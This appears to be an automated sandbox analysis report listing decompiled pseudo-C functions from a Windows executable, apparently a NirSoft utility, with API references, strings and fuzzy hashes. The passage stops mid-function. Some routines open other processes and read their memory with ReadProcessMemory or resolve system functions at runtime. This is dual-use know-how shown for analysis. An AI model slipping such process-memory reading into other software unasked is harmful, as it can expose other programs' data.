                                                                                                  • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                  • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                  • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                  • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 51%
                                                                                                  			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
                                                                                                  				void _v8202;
                                                                                                  				short _v8204;
                                                                                                  				void* _t27;
                                                                                                  				short _t29;
                                                                                                  				short _t40;
                                                                                                  				void* _t41;
                                                                                                  				struct HMENU__* _t43;
                                                                                                  				short _t50;
                                                                                                  				void* _t52;
                                                                                                  				struct HMENU__* _t59;
                                                                                                  
                                                                                                  				E0040B550(0x2008, __ecx);
                                                                                                  				_t65 = _a8 - 4;
                                                                                                  				if(_a8 != 4) {
                                                                                                  					__eflags = _a8 - 5;
                                                                                                  					if(_a8 == 5) {
                                                                                                  						_t50 =  *0x40fe2c; // 0x0
                                                                                                  						__eflags = _t50;
                                                                                                  						if(_t50 == 0) {
                                                                                                  							L8:
                                                                                                  							_push(_a12);
                                                                                                  							_t27 = 5;
                                                                                                  							E00405E8D(_t27);
                                                                                                  							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
                                                                                                  							__eflags = _t29;
                                                                                                  							_a8 = _t29;
                                                                                                  							if(_t29 == 0) {
                                                                                                  								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
                                                                                                  							}
                                                                                                  							_v8204 = 0;
                                                                                                  							memset( &_v8202, 0, 0x2000);
                                                                                                  							GetWindowTextW(_a8,  &_v8204, 0x1000);
                                                                                                  							__eflags = _v8204;
                                                                                                  							if(__eflags != 0) {
                                                                                                  								E00405FAC(__eflags, L"caption",  &_v8204, 0);
                                                                                                  							}
                                                                                                  							EnumChildWindows(_a8, E0040614F, 0);
                                                                                                  							DestroyWindow(_a8);
                                                                                                  						} else {
                                                                                                  							while(1) {
                                                                                                  								_t40 =  *_t50;
                                                                                                  								__eflags = _t40;
                                                                                                  								if(_t40 == 0) {
                                                                                                  									goto L8;
                                                                                                  								}
                                                                                                  								__eflags = _t40 - _a12;
                                                                                                  								if(_t40 != _a12) {
                                                                                                  									_t50 = _t50 + 4;
                                                                                                  									__eflags = _t50;
                                                                                                  									continue;
                                                                                                  								}
                                                                                                  								goto L13;
                                                                                                  							}
                                                                                                  							goto L8;
                                                                                                  						}
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_push(_a12);
                                                                                                  					_t41 = 4;
                                                                                                  					E00405E8D(_t41);
                                                                                                  					_pop(_t52);
                                                                                                  					_t43 = LoadMenuW(_a4, _a12);
                                                                                                  					 *0x40fe20 =  *0x40fe20 & 0x00000000;
                                                                                                  					_t59 = _t43;
                                                                                                  					_push(1);
                                                                                                  					_push(_t59);
                                                                                                  					_push(_a12);
                                                                                                  					E0040605E(_t52, _t65);
                                                                                                  					DestroyMenu(_t59);
                                                                                                  				}
                                                                                                  				L13:
                                                                                                  				return 1;
                                                                                                  			}













                                                                                                  0x00406216
                                                                                                  0x0040621b
                                                                                                  0x00406222
                                                                                                  0x0040625f
                                                                                                  0x00406263
                                                                                                  0x00406269
                                                                                                  0x00406271
                                                                                                  0x00406273
                                                                                                  0x00406289
                                                                                                  0x00406289
                                                                                                  0x0040628e
                                                                                                  0x0040628f
                                                                                                  0x004062a9
                                                                                                  0x004062ab
                                                                                                  0x004062ad
                                                                                                  0x004062b0
                                                                                                  0x004062c3
                                                                                                  0x004062c3
                                                                                                  0x004062d3
                                                                                                  0x004062da
                                                                                                  0x004062f1
                                                                                                  0x004062f7
                                                                                                  0x004062fe
                                                                                                  0x0040630d
                                                                                                  0x00406312
                                                                                                  0x0040631e
                                                                                                  0x00406327
                                                                                                  0x00406275
                                                                                                  0x00406283
                                                                                                  0x00406283
                                                                                                  0x00406285
                                                                                                  0x00406287
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00406277
                                                                                                  0x0040627a
                                                                                                  0x00406280
                                                                                                  0x00406280
                                                                                                  0x00000000
                                                                                                  0x00406280
                                                                                                  0x00000000
                                                                                                  0x0040627a
                                                                                                  0x00000000
                                                                                                  0x00406283
                                                                                                  0x00406273
                                                                                                  0x00406224
                                                                                                  0x00406224
                                                                                                  0x00406229
                                                                                                  0x0040622a
                                                                                                  0x0040622f
                                                                                                  0x00406236
                                                                                                  0x0040623c
                                                                                                  0x00406243
                                                                                                  0x00406245
                                                                                                  0x00406247
                                                                                                  0x00406248
                                                                                                  0x0040624b
                                                                                                  0x00406254
                                                                                                  0x00406254
                                                                                                  0x0040632d
                                                                                                  0x00406334

                                                                                                  APIs
                                                                                                  • LoadMenuW.USER32 ref: 00406236
                                                                                                    • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                    • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                    • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                    • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                  • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                  • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                  • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                  • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                  • memset.MSVCRT ref: 004062DA
                                                                                                  • GetWindowTextW.USER32 ref: 004062F1
                                                                                                  • EnumChildWindows.USER32 ref: 0040631E
                                                                                                  • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                    • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                  • String ID: caption
                                                                                                  • API String ID: 973020956-4135340389
                                                                                                  • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                  • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                  • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                  • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 65%
                                                                                                  			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                  				void _v2050;
                                                                                                  				char _v2052;
                                                                                                  				void _v4098;
                                                                                                  				long _v4100;
                                                                                                  				void _v6146;
                                                                                                  				char _v6148;
                                                                                                  				void* __esi;
                                                                                                  				void* _t43;
                                                                                                  				intOrPtr* _t49;
                                                                                                  				intOrPtr* _t57;
                                                                                                  				void* _t58;
                                                                                                  				void* _t59;
                                                                                                  				intOrPtr _t62;
                                                                                                  				intOrPtr _t63;
                                                                                                  
                                                                                                  				_t49 = __ecx;
                                                                                                  				E0040B550(0x1800, __ecx);
                                                                                                  				_t57 = _t49;
                                                                                                  				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
                                                                                                  				_v4100 = 0;
                                                                                                  				memset( &_v4098, 0, 0x7fe);
                                                                                                  				_v2052 = 0;
                                                                                                  				memset( &_v2050, 0, 0x7fe);
                                                                                                  				_v6148 = 0;
                                                                                                  				memset( &_v6146, 0, 0x7fe);
                                                                                                  				_t59 = _t58 + 0x24;
                                                                                                  				_t62 =  *0x40fe30; // 0x0
                                                                                                  				if(_t62 != 0) {
                                                                                                  					_push(0x40fe30);
                                                                                                  					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
                                                                                                  					_push(0x400);
                                                                                                  					_push( &_v2052);
                                                                                                  					L0040B1EC();
                                                                                                  					_t59 = _t59 + 0x10;
                                                                                                  				}
                                                                                                  				_t63 =  *0x40fe28; // 0x0
                                                                                                  				if(_t63 != 0) {
                                                                                                  					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
                                                                                                  				}
                                                                                                  				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
                                                                                                  				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
                                                                                                  				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
                                                                                                  				_push(0x400);
                                                                                                  				_push( &_v6148);
                                                                                                  				L0040B1EC();
                                                                                                  				_t43 = E00407343(_t57, _a4,  &_v6148);
                                                                                                  				_t64 = _a8 - 5;
                                                                                                  				if(_a8 == 5) {
                                                                                                  					return E00407D03(_t57, _t64, _a4);
                                                                                                  				}
                                                                                                  				return _t43;
                                                                                                  			}

















                                                                                                  0x004081e4
                                                                                                  0x004081ec
                                                                                                  0x004081fc
                                                                                                  0x00408200
                                                                                                  0x00408215
                                                                                                  0x0040821c
                                                                                                  0x0040822a
                                                                                                  0x00408231
                                                                                                  0x0040823f
                                                                                                  0x00408246
                                                                                                  0x0040824b
                                                                                                  0x0040824e
                                                                                                  0x0040825a
                                                                                                  0x0040825c
                                                                                                  0x00408261
                                                                                                  0x0040826c
                                                                                                  0x0040826d
                                                                                                  0x0040826e
                                                                                                  0x00408273
                                                                                                  0x00408273
                                                                                                  0x00408276
                                                                                                  0x0040827c
                                                                                                  0x0040828a
                                                                                                  0x00408290
                                                                                                  0x004082ab
                                                                                                  0x004082c5
                                                                                                  0x004082c6
                                                                                                  0x004082d1
                                                                                                  0x004082d2
                                                                                                  0x004082d3
                                                                                                  0x004082e7
                                                                                                  0x004082ec
                                                                                                  0x004082f0
                                                                                                  0x00000000
                                                                                                  0x004082f5
                                                                                                  0x004082fe

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                  • API String ID: 1283228442-2366825230
                                                                                                  • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                  • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
                                                                                                  • Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                  • Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 85%
                                                                                                  			E0040920A(wchar_t* __edi, wchar_t* __esi) {
                                                                                                  				void _v526;
                                                                                                  				long _v528;
                                                                                                  				wchar_t* _t17;
                                                                                                  				signed int _t40;
                                                                                                  				wchar_t* _t50;
                                                                                                  
                                                                                                  				_t50 = __edi;
                                                                                                  				if(__esi[0] != 0x3a) {
                                                                                                  					_t17 = wcschr( &(__esi[1]), 0x3a);
                                                                                                  					if(_t17 == 0) {
                                                                                                  						_t40 = E0040488D(__esi, L"\\systemroot");
                                                                                                  						if(_t40 < 0) {
                                                                                                  							if( *__esi != 0x5c) {
                                                                                                  								wcscpy(__edi, __esi);
                                                                                                  							} else {
                                                                                                  								_v528 = 0;
                                                                                                  								memset( &_v526, 0, 0x208);
                                                                                                  								E00404C08( &_v528);
                                                                                                  								memcpy(__edi,  &_v528, 4);
                                                                                                  								__edi[1] = __edi[1] & 0x00000000;
                                                                                                  								wcscat(__edi, __esi);
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_v528 = 0;
                                                                                                  							memset( &_v526, 0, 0x208);
                                                                                                  							E00404C08( &_v528);
                                                                                                  							wcscpy(__edi,  &_v528);
                                                                                                  							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                                                  						}
                                                                                                  						L11:
                                                                                                  						return _t50;
                                                                                                  					}
                                                                                                  					_push( &(_t17[0]));
                                                                                                  					L4:
                                                                                                  					wcscpy(_t50, ??);
                                                                                                  					goto L11;
                                                                                                  				}
                                                                                                  				_push(__esi);
                                                                                                  				goto L4;
                                                                                                  			}








                                                                                                  0x0040920a
                                                                                                  0x00409218
                                                                                                  0x00409223
                                                                                                  0x0040922c
                                                                                                  0x0040924b
                                                                                                  0x00409253
                                                                                                  0x0040929b
                                                                                                  0x004092e4
                                                                                                  0x0040929d
                                                                                                  0x004092a3
                                                                                                  0x004092b1
                                                                                                  0x004092bd
                                                                                                  0x004092cc
                                                                                                  0x004092d1
                                                                                                  0x004092d8
                                                                                                  0x004092dd
                                                                                                  0x00409255
                                                                                                  0x0040925b
                                                                                                  0x00409269
                                                                                                  0x00409275
                                                                                                  0x00409282
                                                                                                  0x0040928d
                                                                                                  0x00409292
                                                                                                  0x004092ec
                                                                                                  0x004092ef
                                                                                                  0x004092ef
                                                                                                  0x00409231
                                                                                                  0x00409232
                                                                                                  0x00409233
                                                                                                  0x00000000
                                                                                                  0x00409239
                                                                                                  0x0040921a
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • wcschr.MSVCRT ref: 00409223
                                                                                                  • wcscpy.MSVCRT ref: 00409233
                                                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                    • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                    • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                  • wcscpy.MSVCRT ref: 00409282
                                                                                                  • wcscat.MSVCRT ref: 0040928D
                                                                                                  • memset.MSVCRT ref: 00409269
                                                                                                    • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                    • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                  • memset.MSVCRT ref: 004092B1
                                                                                                  • memcpy.MSVCRT ref: 004092CC
                                                                                                  • wcscat.MSVCRT ref: 004092D8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                  • String ID: \systemroot
                                                                                                  • API String ID: 4173585201-1821301763
                                                                                                  • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                  • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                  • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                  • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 48%
                                                                                                  			E00409C70(signed int* _a4) {
                                                                                                  				signed int _v8;
                                                                                                  				_Unknown_base(*)()* _v12;
                                                                                                  				char* _v16;
                                                                                                  				int _v18;
                                                                                                  				signed int _v20;
                                                                                                  				char _v36;
                                                                                                  				intOrPtr* _t21;
                                                                                                  				struct HINSTANCE__* _t22;
                                                                                                  				signed int _t23;
                                                                                                  				signed int _t24;
                                                                                                  				_Unknown_base(*)()* _t26;
                                                                                                  				char* _t28;
                                                                                                  				int _t31;
                                                                                                  
                                                                                                  				_t21 = _a4;
                                                                                                  				if( *_t21 == 0) {
                                                                                                  					_t22 = GetModuleHandleW(L"kernel32.dll");
                                                                                                  					_v8 = _t22;
                                                                                                  					_t23 = GetProcAddress(_t22, "GetProcAddress");
                                                                                                  					 *_a4 = _t23;
                                                                                                  					_t24 = _t23 ^ _v8;
                                                                                                  					if((_t24 & 0xfff00000) != 0) {
                                                                                                  						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
                                                                                                  						_v20 = _v20 & 0x00000000;
                                                                                                  						_v12 = _t26;
                                                                                                  						asm("stosd");
                                                                                                  						asm("stosw");
                                                                                                  						asm("movsd");
                                                                                                  						asm("movsd");
                                                                                                  						asm("movsd");
                                                                                                  						asm("movsw");
                                                                                                  						_t28 =  &_v36;
                                                                                                  						asm("movsb");
                                                                                                  						_v16 = _t28;
                                                                                                  						_v20 = strlen(_t28);
                                                                                                  						_t31 = strlen( &_v36);
                                                                                                  						_v18 = _t31;
                                                                                                  						_t24 = _v12(_v8,  &_v20, 0, _a4);
                                                                                                  					}
                                                                                                  					return _t24;
                                                                                                  				}
                                                                                                  				return _t21;
                                                                                                  			}
















                                                                                                  0x00409c73
                                                                                                  0x00409c7c
                                                                                                  0x00409c90
                                                                                                  0x00409c9f
                                                                                                  0x00409ca2
                                                                                                  0x00409ca7
                                                                                                  0x00409ca9
                                                                                                  0x00409cb1
                                                                                                  0x00409cc0
                                                                                                  0x00409cc2
                                                                                                  0x00409cc7
                                                                                                  0x00409ccf
                                                                                                  0x00409cd0
                                                                                                  0x00409cd7
                                                                                                  0x00409cd8
                                                                                                  0x00409cd9
                                                                                                  0x00409cda
                                                                                                  0x00409cdc
                                                                                                  0x00409ce0
                                                                                                  0x00409ce1
                                                                                                  0x00409ce9
                                                                                                  0x00409cf1
                                                                                                  0x00409cfb
                                                                                                  0x00409d08
                                                                                                  0x00409d08
                                                                                                  0x00000000
                                                                                                  0x00409d0d
                                                                                                  0x00409d0f

                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                  • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                  • strlen.MSVCRT ref: 00409CE4
                                                                                                  • strlen.MSVCRT ref: 00409CF1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProcstrlen
                                                                                                  • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                  • API String ID: 1027343248-2054640941
                                                                                                  • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                  • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                  • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                  • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 79%
                                                                                                  			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
                                                                                                  				long _v8;
                                                                                                  				int _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				int _v20;
                                                                                                  				int _v24;
                                                                                                  				char _v28;
                                                                                                  				void _v538;
                                                                                                  				char _v540;
                                                                                                  				int _v548;
                                                                                                  				char _v564;
                                                                                                  				char _v22292;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				void* _t37;
                                                                                                  				void* _t48;
                                                                                                  				void* _t56;
                                                                                                  				signed int _t57;
                                                                                                  				void* _t67;
                                                                                                  				long _t69;
                                                                                                  				void* _t70;
                                                                                                  				void* _t72;
                                                                                                  				void* _t74;
                                                                                                  				void* _t76;
                                                                                                  
                                                                                                  				_t67 = __edx;
                                                                                                  				E0040B550(0x5714, __ecx);
                                                                                                  				_t37 = OpenProcess(0x10, 0, _a16);
                                                                                                  				_t82 = _t37;
                                                                                                  				_a16 = _t37;
                                                                                                  				if(_t37 == 0) {
                                                                                                  					_t69 = GetLastError();
                                                                                                  				} else {
                                                                                                  					_t72 =  &_v22292;
                                                                                                  					E0040171F(_t72, _t82);
                                                                                                  					_v8 = 0;
                                                                                                  					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
                                                                                                  						_t69 = GetLastError();
                                                                                                  					} else {
                                                                                                  						_t48 = E00405642( &_v564);
                                                                                                  						_t74 = _v548;
                                                                                                  						_t70 = _t48;
                                                                                                  						_a12 = _t74;
                                                                                                  						_v540 = 0;
                                                                                                  						memset( &_v538, 0, 0x1fe);
                                                                                                  						asm("cdq");
                                                                                                  						_push(_t67);
                                                                                                  						_push(_t74);
                                                                                                  						_push(_t70);
                                                                                                  						_push(L"%d  %I64x");
                                                                                                  						_push(0xff);
                                                                                                  						_push( &_v540);
                                                                                                  						L0040B1EC();
                                                                                                  						_v548 = 0;
                                                                                                  						E004055D1( &_v540,  &_v564);
                                                                                                  						_t16 = _t70 + 0xa; // 0xa
                                                                                                  						_t68 = _t16;
                                                                                                  						_v24 = 0;
                                                                                                  						_v12 = 0;
                                                                                                  						_v20 = 0;
                                                                                                  						_v16 = 0x100;
                                                                                                  						_v28 = 0;
                                                                                                  						E0040559A( &_v28, _t16);
                                                                                                  						_t76 = _v12;
                                                                                                  						_t56 = 0x40c4e8;
                                                                                                  						if(_t76 != 0) {
                                                                                                  							_t56 = _t76;
                                                                                                  						}
                                                                                                  						_t26 = _t70 + 2; // 0x2
                                                                                                  						_t66 = _t70 + _t26;
                                                                                                  						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
                                                                                                  						_t85 = _t76;
                                                                                                  						if(_t76 == 0) {
                                                                                                  							_t76 = 0x40c4e8;
                                                                                                  						}
                                                                                                  						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
                                                                                                  						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
                                                                                                  						E004055D1(_t61,  &_v28);
                                                                                                  					}
                                                                                                  					E004055D1(CloseHandle(_a16),  &_v564);
                                                                                                  				}
                                                                                                  				return _t69;
                                                                                                  			}


























                                                                                                  0x00401ac9
                                                                                                  0x00401ad1
                                                                                                  0x00401ae1
                                                                                                  0x00401ae7
                                                                                                  0x00401ae9
                                                                                                  0x00401aec
                                                                                                  0x00401c1b
                                                                                                  0x00401af2
                                                                                                  0x00401af2
                                                                                                  0x00401af8
                                                                                                  0x00401b0c
                                                                                                  0x00401b1a
                                                                                                  0x00401bfd
                                                                                                  0x00401b20
                                                                                                  0x00401b26
                                                                                                  0x00401b2b
                                                                                                  0x00401b36
                                                                                                  0x00401b40
                                                                                                  0x00401b43
                                                                                                  0x00401b4a
                                                                                                  0x00401b54
                                                                                                  0x00401b55
                                                                                                  0x00401b56
                                                                                                  0x00401b57
                                                                                                  0x00401b58
                                                                                                  0x00401b63
                                                                                                  0x00401b68
                                                                                                  0x00401b69
                                                                                                  0x00401b77
                                                                                                  0x00401b7d
                                                                                                  0x00401b82
                                                                                                  0x00401b82
                                                                                                  0x00401b88
                                                                                                  0x00401b8b
                                                                                                  0x00401b8e
                                                                                                  0x00401b91
                                                                                                  0x00401b98
                                                                                                  0x00401b9b
                                                                                                  0x00401ba0
                                                                                                  0x00401ba5
                                                                                                  0x00401baa
                                                                                                  0x00401bac
                                                                                                  0x00401bac
                                                                                                  0x00401bb2
                                                                                                  0x00401bb2
                                                                                                  0x00401bbe
                                                                                                  0x00401bc4
                                                                                                  0x00401bc6
                                                                                                  0x00401bc8
                                                                                                  0x00401bc8
                                                                                                  0x00401bd7
                                                                                                  0x00401bee
                                                                                                  0x00401bf0
                                                                                                  0x00401bf0
                                                                                                  0x00401c0e
                                                                                                  0x00401c0e
                                                                                                  0x00401c23

                                                                                                  APIs
                                                                                                  • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                  • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                  • memset.MSVCRT ref: 00401B4A
                                                                                                  • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                  • _snwprintf.MSVCRT ref: 00401B69
                                                                                                    • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                    • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                  • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                  • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                                  • String ID: %d %I64x
                                                                                                  • API String ID: 2567117392-2565891505
                                                                                                  • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                  • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                  • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                  • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 39%
                                                                                                  			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
                                                                                                  				void* _v8;
                                                                                                  				void _v2054;
                                                                                                  				short _v2056;
                                                                                                  				void _v4102;
                                                                                                  				short _v4104;
